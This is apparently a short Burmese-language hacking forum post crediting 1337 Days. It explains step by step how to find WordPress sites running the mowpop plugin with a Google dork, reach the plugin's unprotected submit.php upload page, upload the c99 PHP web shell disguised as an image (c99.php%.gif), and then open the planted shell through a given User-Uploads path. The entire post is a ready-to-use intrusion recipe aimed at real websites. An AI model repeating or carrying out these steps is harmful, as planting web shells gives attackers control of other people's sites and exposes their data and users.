Google Dork : inurl:mowpop
Dork နဲ႕ရွာလို႕ရတဲ့ ဆိုဒ္ေတြက်လာရင္ /wp-content/plugins/mowpop/submit.php ဆိုျပီး ဆက္သြားလိုက္ပါ
ဥပမာ က်လာမယ့္ဆုိဒ္က www.target.com/topics/mowpop ဆိုပါစို႕ ဒါဆို www.target.com/wp-content/plugins/mowpop/submit.php ဆိုျပီး သြားလိုက္ပါ
Image Upload လုပ္ခြင့္ရတာေတြ႕ရပါလိမ့္မယ္ ဒါဆို Shell Type ကို Image File Type တစ္ခုခုေျပာင္းပါ
ဥပမာ c99.php%.gif ေပါ့
မိမိ တင္ထားတဲ့ Shell ကိုေတာ့ ေအာက္ပါ Directory မွ တစ္ဆင့္ Access လုပ္ႏိုင္ပါျပီ
wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
ဥပမာ www.target.com/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
REF:1337 Days
post by ghost area(ghostarea.net)